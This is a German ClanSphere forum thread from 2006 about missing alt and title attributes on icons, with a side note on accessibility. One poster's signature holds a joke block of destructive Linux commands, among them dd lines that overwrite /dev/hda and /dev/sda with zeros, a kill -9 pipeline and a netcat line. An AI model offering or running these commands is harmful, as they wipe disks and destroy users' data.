Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 10
Seite [1]
RiDDleR


Try to beat me





Beiträge: 141
# Thema - 21.12.2006 um 17:19 Uhr
Also, durch die Benutzung hier auf CS merke ich das schon oft, mir fehlen irgendwie die Alt-Tags bei allen Bildern. Bisher ist das oft eher noch Try&Error. Bin es gewohnt, bei Bildern kurz mit der Maus drüber zu gehen und dann kommt z.B. "Antworten", "Editieren" etc. ... fände ich sehr komfortabel und würde die Usability um einiges steigern bei Eurem sonst sehr guten Projekt!

Edit: erkenne aber auch, dass das sehr viel Arbeit bedeutet!


------------------
Newsletter - bitte helt mir bei diesem Problem: +-
------------------


Zuletzt editiert von RiDDleR am 21.12.2006 um 19:51 Uhr (2x Editiert)
Inaktiv
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 1 - 21.12.2006 um 17:24 Uhr
an sich bei den Icons sollte das überall vorhanden sein.

Bei anderen Bildern, die mit cs_img dargerstellt werden, kann man den Alt Tag manuell hinzufügen.


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
RiDDleR
Thread-Ersteller


Try to beat me





Beiträge: 141
# Antwort: 2 - 21.12.2006 um 18:23 Uhr
Also, wenn ich z.B. auch gerade hier im Forum über ein Bild gehe (das E-Mail Icon, das Nichtricht senden-Icon) wird mir kein Text angezeigt! Hab Firefox 2.0.0.1


------------------
Newsletter - bitte helt mir bei diesem Problem: +-
------------------


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 3 - 21.12.2006 um 18:34 Uhr
jo das liegt daran, das in der function getUserIcons die dazugehoerigen Vars fehlen


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 21.12.2006 um 18:45 Uhr
Öhm wenn du mit der Maus über ein Bild gehst, und einen Text haben willst, brauchst du einen title=""- Tag. der Alt-Tag dient dazu, dass wenn eion Bild nicht gefunden werden kann, dass stattdessen der alt-Tag angezeigt wird.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
RiDDleR
Thread-Ersteller


Try to beat me





Beiträge: 141
# Antwort: 5 - 21.12.2006 um 19:45 Uhr
Äh, ja, sorry, verwechselt ... ich meinte natürlich den Title-Tag!


------------------
Newsletter - bitte helt mir bei diesem Problem: +-
------------------


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 6 - 21.12.2006 um 19:52 Uhr
hrhr kein Ding, ich wusste was du meinst, is mir nur nicht gleich aufgefallen, das es in dem falle der titel ist *g*


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
Adva


Wannabe poster





Beiträge: 21
# Antwort: 7 - 29.12.2006 um 23:10 Uhr
Ein weiterer, wichtiger Grund Bildern einen ALT-Tag zuzuweisen besteht in der Barrierefreiheit. Allerdings ist hier zwischen wichtigen Bildern und Bildern, die nur das Design aufmöbeln zu unterscheiden. Letztere bekommen einen leeren ALT-Tag zugewiesen.
Speziellen, behindertengerechten Browsern und Programmen ist es nicht möglich, Inhalte von Bildern zu interpretieren und deshalb ist eine kleine Beschreibung, was auf dem Bild zu sehen ist, nötig. Dies wird mittels des ALT- und LONGDESC-Tags getätigt.

Hier könnt ihr das oben erwähnte nachlesen.

Mehr entnehmt ihr den Barrierefreien Webdesign Richtlinien und der Barrierefreien Informationstechnik-Verordnung, welche die Standards festlegt.

mfg


Zuletzt editiert von Adva am 29.12.2006 um 23:13 Uhr (1x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 8 - 30.12.2006 um 03:15 Uhr
oO das wird doch auch so gemacht, also die clansphere-image und symbol oder icon- funktionen fügen alle automatisch ein alt-Tag ein, aber es geht hier in dem thread um das title-attribut^^


------------------
www.laszlokorte.de

Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 9 - 30.12.2006 um 03:34 Uhr
RiDDleR hat an einer stelle vergessen alt zu editieren damits dann title ist, war missverständlich, aber Adva hätts gesehn wenn er die comments gelesen hätte

@topic: ich merks mir und wenn ich über ne stelle ohne title tags bei wichtigen imgs stolper bau ichs schnell ein


Inaktiv
|
Adva


Wannabe poster





Beiträge: 21
# Antwort: 10 - 30.12.2006 um 15:22 Uhr
Mein Kommentar bezog sich auf pHaeno*'s Kommentar weiter oben:
Der Alt-Tag dient dazu, dass wenn eion Bild nicht gefunden werden kann, dass stattdessen der alt-Tag angezeigt wird.
Grundsätzlich richtig, der ALT-Tag wird angezeigt, wenn das Bild nicht geladen werden konnte. Dies ist aber nicht der einzige Grund, einen alternativen Text für ein Bild zu setzen, wie ihr meinem Kommentar entnehmen könnt. Darauf wollte ich nur hinweisen

mfg


Inaktiv
|
Antworten: 10
Seite [1]


Sie müssen sich registrieren, um zu antworten.